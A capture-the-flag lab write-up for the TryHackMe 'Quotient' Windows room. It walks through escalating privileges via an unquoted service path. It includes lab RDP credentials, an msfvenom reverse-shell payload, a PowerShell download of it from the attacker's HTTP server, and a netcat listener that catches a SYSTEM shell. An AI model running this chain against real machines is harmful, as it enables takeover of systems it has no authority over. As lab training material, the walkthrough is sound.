THM Writeup – Quotient
Grammar is important. Don’t believe me? Just see what happens when you forget punctuation.
Grammar is important. Don’t believe me? Just see what happens when you forget punctuation.
Add IP address to your hosts file:
echo '10.10.215.122 quotient.thm' >> /etc/hostsAccess the machine using RDP:
xfreerdp /u:sage /p:"gr33ntHEphgK2&V" /v:quotient.thm /dynamic-resolution +clipboardNow let’s look around…
Enumeration
Get current user privileges:
C:\Users\Sage>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\Sage>List users:
C:\Users\Sage>net user
User accounts for \\THM-QUOTIENT
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Sage WDAGUtilityAccount
The command completed successfully.
C:\Users\Sage>I looked for unusual files/folders and found this:
c:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 4448-19F9
Directory of c:\Program Files
03/07/2022 07:23 AM <DIR> .
03/07/2022 07:23 AM <DIR> ..
03/07/2022 07:27 AM <DIR> Amazon
09/15/2018 08:28 AM <DIR> Common Files
03/07/2022 05:27 AM <DIR> Development Files
07/19/2022 01:05 PM <DIR> internet explorer
07/19/2022 01:05 PM <DIR> Windows Defender
07/19/2022 01:05 PM <DIR> Windows Defender Advanced Threat Protection
07/19/2022 01:05 PM <DIR> Windows Mail
07/19/2022 01:05 PM <DIR> Windows Media Player
09/15/2018 08:19 AM <DIR> Windows Multimedia Platform
09/15/2018 08:28 AM <DIR> windows nt
07/19/2022 01:05 PM <DIR> Windows Photo Viewer
09/15/2018 08:19 AM <DIR> Windows Portable Devices
09/15/2018 08:19 AM <DIR> Windows Security
09/15/2018 08:19 AM <DIR> WindowsPowerShell
0 File(s) 0 bytes
16 Dir(s) 24,292,122,624 bytes free
c:\Program Files>Development Files is an unusual folder in the Program Files folder.
Let’s take a closer look at it:
c:\Program Files>cd "Development Files"
c:\Program Files\Development Files>dir
Volume in drive C has no label.
Volume Serial Number is 4448-19F9
Directory of c:\Program Files\Development Files
03/07/2022 05:27 AM <DIR> .
03/07/2022 05:27 AM <DIR> ..
03/07/2022 04:03 AM <DIR> Devservice Files
0 File(s) 0 bytes
3 Dir(s) 24,292,122,624 bytes free
c:\Program Files\Development Files>cd "Devservice Files"
c:\Program Files\Development Files\Devservice Files>dir
Volume in drive C has no label.
Volume Serial Number is 4448-19F9
Directory of c:\Program Files\Development Files\Devservice Files
03/07/2022 04:03 AM <DIR> .
03/07/2022 04:03 AM <DIR> ..
03/07/2022 04:03 AM 5,966,336 Service.exe
1 File(s) 5,966,336 bytes
2 Dir(s) 24,292,122,624 bytes free
c:\Program Files\Development Files\Devservice Files>We have some Service.exe executable here. What immediatelly got to my mind is unquoted service path…
Try to find a service that executes Service.exe:
C:\Users\Sage>wmic service get name,displayname,pathname,startmode | findstr Service.exe
Developmenet Service Development Service C:\Program Files\Development Files\Devservice Files\Service.exe Auto
Microsoft (R) Diagnostics Hub Standard Collector Service diagnosticshub.standardcollector.service C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Manual
Windows Security Service SecurityHealthService C:\Windows\system32\SecurityHealthService.exe Manual
Sensor Data Service SensorDataService C:\Windows\System32\SensorDataService.exe Disabled
Storage Tiers Management TieringEngineService C:\Windows\system32\TieringEngineService.exe Manual
User Experience Virtualization Service UevAgentService C:\Windows\system32\AgentService.exe Disabled
C:\Users\Sage>Great, we found a service that uses our executable.
Get details of the service:
C:\Users\Sage>sc qc "Development Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Development Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Development Files\Devservice Files\Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Developmenet Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Sage>This definitely is unquoted service path and it’s start type is AUTO_START = it starts on boot. To exploit this we need write permissions in a folder in the path.
So check folders permissions:
C:\Users\Sage>icacls "C:\Program Files\Development Files\ "
C:\Program Files\Development Files\ BUILTIN\Users:(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Sage>BUILTIN\Users:(W) – Awesome, we have write permissions here: C:\Program Files\Development Files\
It looks like we have everything to exploit unquoted service path privilege escalation path.
Let’s recap how unquoted service path works:
Our service executable is located at C:\Program Files\Development Files\Devservice Files\ and if the service path is unquoted the service searches it’s executable like this:
- C:\Program.exe
- C:\Program Files\Development.exe
- C:\Program Files\Development Files\Devservice.exe
- C:\Program Files\Development Files\Devservice Files\Service.exe
We have write permissions on C:\Program Files\Development Files\ so we need to name our new executable as Devservice.exe and place it here: C:\Program Files\Development Files\Devservice.exe. Then we need to restart the computer, since the service auto starts on boot…
Getting Reverse Shell
First generate a payload (our new service executable) with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.187.41 LPORT=4242 -f exe -o Devservice.exeRun a http server with python:
python3 -m http.serverOpen another terminal and start a netcat listener:
nc -lnvp 4242On our target machine go to the folder with write permissions and download our payload:
cd "C:\Program Files\Development Files\"
powershell Invoke-WebRequest -Uri http://10.10.187.41:8000/Devservice.exe -Outfile Devservice.exeNow restart the target machine and wait for the service (our executable) to execute:
shutdown /r /t 0And we have a reverse shell:
root@attackbox:~# nc -lnvp 4242
Listening on [0.0.0.0] (family 0, port 4242)
Connection from 10.10.215.122 49669 received!
Microsoft Windows [Version 10.0.17763.3165]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Now find the flag and read it:
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4448-19F9
Directory of c:\Users\Administrator\Desktop
07/19/2022 01:23 PM <DIR> .
07/19/2022 01:23 PM <DIR> ..
07/19/2022 11:34 AM 17 flag.txt
1 File(s) 17 bytes
2 Dir(s) 24,290,566,144 bytes free
c:\Users\Administrator\Desktop>more flag.txt
more flag.txt
THM{[REDACTED]}Do you like this writeup? Check out other THM Writeups.